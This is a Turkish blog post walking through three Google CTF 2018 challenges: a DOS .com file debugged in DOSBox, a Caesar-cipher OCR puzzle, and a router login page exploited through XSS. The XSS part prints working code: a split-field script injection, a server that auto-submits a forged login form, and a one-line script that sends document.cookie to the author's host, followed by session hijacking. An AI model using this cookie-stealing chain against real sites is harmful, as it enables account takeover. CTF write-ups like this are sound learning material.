Yazılım

Google CTF Macerası #2

author @atagulalan

Milattan Sonra 9 Ağustos 2018 Perşembe

7 dakikada okunur

Daha önce hiçbir CTF'e katılmamış biri olarak ilk maceradan çok keyif aldım. İkinci maceraya başlarken de, ilk maceradaki gibi heyecan içerisindeyim.

Bir önceki yazıya buradan ulaşabilirsiniz:

Google CTF Macerası #1

Bölüm 4 (Aşağıdaki, Pembe) - Floppy2

Bir önceki yazıdaki Bölüm 2'de bulunan www.com, şimdi işimize yarayacak gibi gözüküyor.

www.com dosyasının içeriği:

hD7X-t6ug_hl(]Wh8$^15GG1-hbrX5prPYGW^QFIuxYGFK,1-FGIuqZhHIX%A)I!hSLX4SI!{p*S:eTM'~_?o?V;m;CgAA]Ud)HO;{ l{}9l>jLLP[-`|0gvPY0onQ0geZ0wY5>D0g]h+(X-k&4`P[0/,64"P4APG
The Foobanizer9000 is no longer on the OffHub DMZ.          $

İlk gözüme çarpan şey, Bu dosyanın com uzantılı bir dosya olmasıydı.

COM uzantısı, ilk kez DOS için 1970'lerde üretilmiştir.

Tabii artık Windows, COM uzantılı dosyalar yerine, "çalıştırılabilir, yürütülebilir" anlamına gelen EXE uzantılı dosyaları kullanıyor.

Bu dosyayı çalıştırabilmek için 16 bit bir bilgisayara ihtiyacımız var. Eğer işletim sisteminiz 32 bit ise işiniz daha kolay olabilir, çünkü daha geçen güne kadar Windows 32 bit, 16 bit uyumlu geliyordu.

Ama benim işletim sistemim 64 bit?

İşte o zaman DOSBOX adlı bir programa ihtiyacınız var.

DOSBOX, DOS işletim sistemi çalıştıran bir emülatör programıdır.

Bunun yanında DEBUG etmek için de bir uygulamaya ihtiyacınız var. Şuradan indirebilirsiniz: debug.zip

Dosyayı indirdikten sonra DOSBOX'u açıyoruz ve istediğimiz klasörü mount ediyoruz yerleştiriyoruz. Daha sonra yerleştirdiğimiz sürücüye giriyoruz ve dosyamızı çalıştırıyoruz.

İndirdiğimiz debug dosyasının komutlarını listelemek için ? yazıyoruz ve komutlar listeleniyor.

Bize lazım olan komutlar d memory dump (bellek dökümü), g go (başlat) ve q quit (çıkış).

Başlattıktan sonra bellek dökümüna baktığımızda flag'in burada gözüktüğünü görebiliriz.

Flag'imiz, CTF{g00do1dDOS-FTW}

Bölüm 5 (Yukarıdaki, Pembe) - OCR Is Cool!

Caesar Cipher'in Sezar Şifrelemenin ne olduğunu bildiğim için Caesar kelimesini duyar duymaz bu bölümün ne olduğunu az çok kestirebilmiştim. Bize bir ekran görüntüsü verilecek ve OCR (Optical Character Recognition, Optik Karakter Tanıma) ile biz bu yazıyı okuyacağız.

Daha sonra sezar şifreleme metodu kullanarak karakterleri n adım ileri veya geri getirerek yazıyı okunabilir hale getireceğiz.

Örneğin n=4 olsun.

ÖncesiSonrası
ae
bf
cg
MerhabaQivlefe

Bunun tersini yaparsak da Qivlefe kelimesinden "Merhaba"'yı bulabiliyoruz.

Px tkx, We are'a n=7'de çevriliyor.

Hemen bir Online OCR bulup şansımızı deneyelim. Ve daha sonra Online Caesar Cipher bulup bunu çevirelim.

Şöyle bir metin geçiyor elimize:

Dear Customer.

We are already welcome to our newest customer if our secure iDrop Drive cloud file sharing service. A safe place for all your files.

Store any file
iDropDrive starts with 15 PB if free online or offline storage, so you can keep warez, binaries, paintings, flags, firmwares. bitcoins, writeups - anything.

See your stuff whatever
your files in iDrop Drive can be reused from any foobanizer, smart fridge 2000. smart thirst, Tempo-a-matic, or media pc. So wherever you go, your files follow.

Share files and folders
You can quickly invite others to view, download, and collaborate on all the files you want via email attachments. Just give them the link CTF{caesarcipherisasubstitutioncipher} and they can add all your data.

For example, download a list of files that you're currently working with us:
offhub_firmware.bin JohnTR
IOT_credentials.pdf\ \(deleted\) Wintermuted
Foobanizer9000_Manual.pdf Wintermuted
foo.ico Turbo

Since we take security very seriously and in order to protect against vulnerabilities like efail and amdflaws, we 're sending you your credentials using the military-grade time-proven caesarean symmetric cipher.

Happy iDropDriving!

Burada da açıkça görüldüğü üzere şifremiz CTF{caesarcipherisasubstitutioncipher}

Bölüm 6 (Ortadaki, Mavi) - ROUTER-UI

Yapılacaklar:

  • XSS açığı bul
  • XSS açığını Chrome'a kaptırma
  • Session bilgilerini çal
  • Kedili mail at

XSS Nedir?

Siteler Arası Betik Çalıştırma (XSS), genellikle web uygulamalarında bulunan bir tür bilgisayar güvenlik açıklığıdır. XSS, diğer kullanıcılar tarafından görüntülenen web sayfalarına istemci taraflı kodun enjekte edilmesine imkan verir.

Öncelikle XSS açığı çalışıyor mu diye bir bakalım.

Ve, anında Chrome'a yakalandık. :(

Demek ki XSS açığı varmış. Peki Chrome'un bu açığı engellememesini nasıl sağlayabilirim?

Direk olarak script çalıştırmak yerine bir kullanıcı adı/şifre denediğimde, sayfanın bana verdiği sonuç:

Wrong credentials: username//password

Burada dikkatimi çeken şey, iki adet bölü işareti bulunması. Bu işareti farklı bir siteden script çağırırken kullanabiliriz.

Kullanıcı adı: <script src="http:
Şifre: xava.me/hek.js"></script>

Dönen Mesaj:

Wrong credentials:

Yaşasın! Scriptimizi başarıyla çalıştırdık... mı acaba?

Madem çalıştırdık, neden bir alert gelmedi? Hemen Chrome Geliştirici Konsolunu açıyorum ve Network sekmesini inceliyorum.

İsteğimizin HTTP portundan gönderilmesi sonucu Mixed Content hatasına yakalanmışız.

Mixed Content hatasının sebebi

Sayfa HTTPS, diğer kaynaklar HTTP bağlantısı üzerinden yüklenirse; güvenli olan SSL sertifikası sebebiyle tarayıcı, güvensiz olan HTTP protokolünden yüklenmeye çalışan verilerin bağlantısını kesiyor.

İsteğimizin HTTPS portundan yapılması gerekiyor. Bunun için hemen bir FireBase projesi açıp hosting ayarladım.

Kullanıcı adı: <script src="https:
Şifre: xavactf.firebaseapp.com/hek.js"></script>

Ve istenen mesaj:

Bundan sonrası çorap söküğü gibi gelecek. Bu JavaScript ile dökümana bir img elementi koyduk mu session bilgileri eilimizde.

Bunun için FireBase üzerinde NodeJS kullanıyorum. Google botunu hacklemek için Google servisi kullanmak gibisi yok.

Sunucu tarafında çalışan index.js içeriği:

const functions = require('firebase-functions');
const admin = require('firebase-admin');
const express = require('express');
const app = express();
admin.initializeApp({databaseURL: 'https://xavactf.firebaseio.com',});

app.get('/cats', (req,res) => {
    res.send('<form action="https://router-ui.web.ctfcompetition.com/login" method="post"><input type="text" name="username" value="&#x3C;script src=&#x22;"><input type="password" name="password" value="xavactf.firebaseapp.com/hack.js&#x22;&#x3E;&#x3C;/script&#x3E;"></form><script>document.forms[0].submit();</script>');
});

app.get('/session', (req,res) => {
    admin.database().ref('/sessions').child(Date.now()).set(req.query);
    res.send("Page could not be loaded");
});

exports.app = functions.https.onRequest(app);

Client tarafında çalışan hack.js içeriği:

document.writeln("<img src='https://xavactf.firebaseapp.com/session?session="+document.cookie+"' />")

Burada yapılan yöntem şu şekilde:

  • Mail olarak [LINK]/cats yolluyorum
  • Arkadaş maili açar açmaz kullanıcı adı ve şifresi önceden belirlenmiş bir şekilde ilgili siteye post ediliyor.
  • Sitedeki XSS açığı [LINK]/hack.js'i çağırıyor.
  • hack.js, sayfaya bir resim entegre ediyor. Resmin adresi [LINK]/session?session=[COOKIE] şeklinde.
  • [LINK]/session adresi, veritabanına URL'inde bulduğu parametreleri kaydediyor.
  • Ben de bu veritabanından parametreleri çekiyorum.

Kısacası, session bilgilerini almak istediğim sunucu, benim JS betiğimi client tarafında çalıştırdığında, kullanıcının tarayıcısından verileri hüpletiyorum.

Mailimi attım ve tuzağıma düşüşünü izledim >:)

Tıkladığını da veritabanımdan kontrol ettim:

Session bilgileri:

"flag=Try the session cookie; session=Avaev8thDieM6Quauoh2TuDeaez9Weja"

Session bilgilerini, konsolda document.cookie="..." çalıştırarak içeriye sızdım.

Google-Haus Credentials'e sağ tıkladım ve...

Şifre kabak gibi ortaya çıktı. Şifremiz, CTF{Kao4pheitot7Ahmu}

Yeni bittim, yine bittim.

Bu seferki o kadar zor geçmedi sanki? Sorularınızı, yorumlarınızı bekliyorum! ^_^